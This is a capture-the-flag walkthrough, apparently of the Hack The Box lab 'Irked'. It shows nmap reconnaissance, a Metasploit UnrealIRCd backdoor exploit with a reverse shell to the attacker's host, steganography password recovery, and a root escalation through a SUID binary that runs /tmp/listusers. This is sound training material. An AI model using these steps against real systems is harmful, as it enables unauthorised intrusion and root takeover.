$ nmap -A -T4 -p- 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-15 22:50 CEST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36864/udp6 status
| 100024 1 39620/udp status
| 100024 1 44996/tcp6 status
|_ 100024 1 59146/tcp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
59146/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.04 seconds
Access to http://10.10.10.117

According to Nmap’s results, we have open these ports related to UrealIRCd:
- 6697/tcp open irc UnrealIRCd
- 8067/tcp open irc UnrealIRCd
- 65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
As we have an IRC in this box let’s start trying to connect to it.
$ sudo irssi 10.10.10.117 65534
Irssi v1.2.2-1+b1 - https://irssi.org
17:18 -!- Irssi: Looking up 10.10.10.117
17:18 -!- Irssi: The following settings were initialized
17:18 real_name root
17:18 user_name root
17:18 nick root
17:18 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 65534
17:18 -!- Irssi: Connection to 10.10.10.117 established
17:18 !irked.htb *** Looking up your hostname...
17:18 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
17:18 -!- You have not registered
17:18 -!- Welcome to the ROXnet IRC Network root!root@10.10.14.25
17:18 -!- Your host is irked.htb, running version Unreal3.2.8.1
17:18 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
17:18 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
17:18 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307
MAXTARGETS=20 are supported by this server
17:18 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet
CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
17:18 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
17:18 -!- There are 1 users and 0 invisible on 1 servers
17:18 -!- I have 1 clients and 0 servers
17:18 -!- Current Local Users: 1 Max: 2
17:18 -!- Current Global Users: 1 Max: 2
17:18 -!- MOTD File is missing
17:18 -!- Mode change [+iwx] for user root
According to this, we have a UnrealIRC version 3.2.8.1
$ searchsploit unrealirc
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Exploiting UnrealIRC
According to https://www.exploit-db.com/exploits/16922
UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075
We can use a Metasploit module directly.
msf5 > search unrealirc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
msf5 > use 0
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 65534
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_perl manual No Unix Command Shell, Bind TCP (via Perl)
1 cmd/unix/bind_perl_ipv6 manual No Unix Command Shell, Bind TCP (via perl) IPv6
2 cmd/unix/bind_ruby manual No Unix Command Shell, Bind TCP (via Ruby)
3 cmd/unix/bind_ruby_ipv6 manual No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 cmd/unix/generic manual No Unix Command, Generic Command Execution
5 cmd/unix/reverse manual No Unix Command Shell, Double Reverse TCP (telnet)
6 cmd/unix/reverse_bash_telnet_ssl manual No Unix Command Shell, Reverse TCP SSL (telnet)
7 cmd/unix/reverse_perl manual No Unix Command Shell, Reverse TCP (via Perl)
8 cmd/unix/reverse_perl_ssl manual No Unix Command Shell, Reverse TCP SSL (via perl)
9 cmd/unix/reverse_ruby manual No Unix Command Shell, Reverse TCP (via Ruby)
10 cmd/unix/reverse_ruby_ssl manual No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 cmd/unix/reverse_ssl_double_telnet manual No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > use 5
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 65534 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[-] 10.10.10.117:65534 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 65534 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.25
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 65534 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.25 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] 10.10.10.117:65534 - Connected to 10.10.10.117:65534...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:65534 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo nRUzxoihQNyXr1sC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "nRUzxoihQNyXr1sC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.117:52954) at
whoami
ircd
python3 -c "import pty;pty.spawn('/bin/bash')"
ircd@irked:~$
ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
Based on this comment we seem to be with the steganography.
In the steganography, messages are hidden usually into images.
How many images have we seen so far?
Only in http://10.10.10.117
Download this image to our local machine.
$ ls
irked.jpg linpeas.sh results
$ steghide extract -sf irked.jpg
Anotar salvoconducto:
anot� los datos extra�dos e/"pass.txt".
Use password found in .backup file.
$ cat pass.txt
Kab6h+m+bbp2J:HG
ircd@irked:/home$ su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:/home$ ls
djmardov ircd
djmardov@irked:/home$ cd djmardov
djmardov@irked:~$ cd Documents
djmardov@irked:~/Documents$ cat user.txt
4a66XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Based on the Linpeas results, the list of the suid files is this.
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-sr-x 1 root root 9.3K Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 95K Aug 13 2014 /sbin/mount.nfs
-rwsr-sr-x 1 daemon daemon 50K Sep 30 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 14K Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 26K Mar 29 2015 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 34K Mar 29 2015 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-- 1 root dip 332K Apr 14 2015 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 34K Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 14K Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 18K Sep 8 2016 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-- 1 root messagebus 355K Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 158K Jan 28 2017 /bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 9.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 77K May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 43K May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 38K May 17 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 38K May 17 2017 /bin/su
-rwsr-sr-x 1 root mail 94K Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 550K Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 1.1M Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 7.2K May 16 2018 /usr/bin/viewuser
By default, /usr/bin/viewuser is not installed in a Linux system.
So we have a 1st candidate to analyze.
djmardov@irked:/usr/bin$ ls -la viewuser
-rwsr-xr-x 1 root root 7328 May 16 2018 viewuser
djmardov@irked:/usr/bin$ file viewuser
viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped
djmardov@irked:/usr/bin$ ./viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-10-15 16:45 (:0)
sh: 1: /tmp/listusers: not found
$ scp djmardov@10.10.10.117:/usr/bin/viewuser viewuser
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts.
djmardov@10.10.10.117's password:
viewuser
$ r2 viewuser
[0x00000440]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Finding function preludes
[x] Enable constraint types analysis for variables
[0x00000440]> afl
0x00000440 1 49 entry0
0x00000472 1 4 fcn.00000472
0x00000410 1 6 sym.imp.__libc_start_main
0x00000490 4 58 -> 53 sym.deregister_tm_clones
0x00000579 1 4 sym.__x86.get_pc_thunk.dx
0x000004d0 4 71 sym.register_tm_clones
0x00000520 5 71 entry.fini0
0x00000480 1 4 sym.__x86.get_pc_thunk.bx
0x00000570 1 9 entry.init0
0x00000660 1 2 sym.__libc_csu_fini
0x00000664 1 20 sym._fini
0x00000600 4 93 sym.__libc_csu_init
0x0000057d 1 126 main
0x000003f0 1 6 sym.imp.puts
0x00000400 1 6 sym.imp.system
0x00000420 1 6 sym.imp.setuid
0x000003bc 3 35 sym._init
0x00000000 2 32 loc.imp._ITM_deregisterTMCloneTable
[0x00000440]> pdf @main
┌ 126: int main (int32_t arg_4h);
│ ; var int32_t var_8h @ ebp-0x8
│ ; arg int32_t arg_4h @ esp+0x24
│ 0x0000057d 8d4c2404 lea ecx, dword [arg_4h]
│ 0x00000581 83e4f0 and esp, 0xfffffff0
│ 0x00000584 ff71fc push dword [ecx - 4]
│ 0x00000587 55 push ebp
│ 0x00000588 89e5 mov ebp, esp
│ 0x0000058a 53 push ebx
│ 0x0000058b 51 push ecx
│ 0x0000058c e8effeffff call sym.__x86.get_pc_thunk.bx
│ 0x00000591 81c36f1a0000 add ebx, 0x1a6f
│ 0x00000597 83ec0c sub esp, 0xc
│ 0x0000059a 8d8380e6ffff lea eax, dword [ebx - 0x1980]
│ 0x000005a0 50 push eax ; const char *s
│ 0x000005a1 e84afeffff call sym.imp.puts ; int puts(const char *s)
│ 0x000005a6 83c410 add esp, 0x10
│ 0x000005a9 83ec0c sub esp, 0xc
│ 0x000005ac 8d83c8e6ffff lea eax, dword [ebx - 0x1938]
│ 0x000005b2 50 push eax ; const char *s
│ 0x000005b3 e838feffff call sym.imp.puts ; int puts(const char *s)
│ 0x000005b8 83c410 add esp, 0x10
│ 0x000005bb 83ec0c sub esp, 0xc
│ 0x000005be 8d83ede6ffff lea eax, dword [ebx - 0x1913]
│ 0x000005c4 50 push eax ; const char *string
│ 0x000005c5 e836feffff call sym.imp.system ; int system(const char *string)
│ 0x000005ca 83c410 add esp, 0x10
│ 0x000005cd 83ec0c sub esp, 0xc
│ 0x000005d0 6a00 push 0
│ 0x000005d2 e849feffff call sym.imp.setuid
│ 0x000005d7 83c410 add esp, 0x10
│ 0x000005da 83ec0c sub esp, 0xc
│ 0x000005dd 8d83f1e6ffff lea eax, dword [ebx - 0x190f]
│ 0x000005e3 50 push eax ; const char *string
│ 0x000005e4 e817feffff call sym.imp.system ; int system(const char *string)
│ 0x000005e9 83c410 add esp, 0x10
│ 0x000005ec b800000000 mov eax, 0
│ 0x000005f1 8d65f8 lea esp, dword [var_8h]
│ 0x000005f4 59 pop ecx
│ 0x000005f5 5b pop ebx
│ 0x000005f6 5d pop ebp
│ 0x000005f7 8d61fc lea esp, dword [ecx - 4]
└ 0x000005fa c3 ret
According to this information this application calls to setuid function and later calls system function to run the parameter (/tmp/listusers)
This can be exploited by creating a file /tmp/listusers with a malicious code which will get executed by root when it is called by the viewuser binary.
djmardov@irked:/tmp$ echo "/bin/sh" > listusers
echo "/bin/sh" > listusers
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ ./viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-10-15 16:45 (:0)
sh: 1: /tmp/listusers: Permission denied
djmardov@irked:/usr/bin$ cd /tmp
djmardov@irked:/tmp$ chmod 777 listusers
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ ./viewuse
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-10-15 16:45 (:0)
#
#whoami
root
#cd /root
#ls
pass.txt root.txt
#cat pass.txt
Kab6h+m+bbp2J:HG
#cat root.txt
8d8eXXXXXXXXXXXXXXXXXXXXXXXXXXXX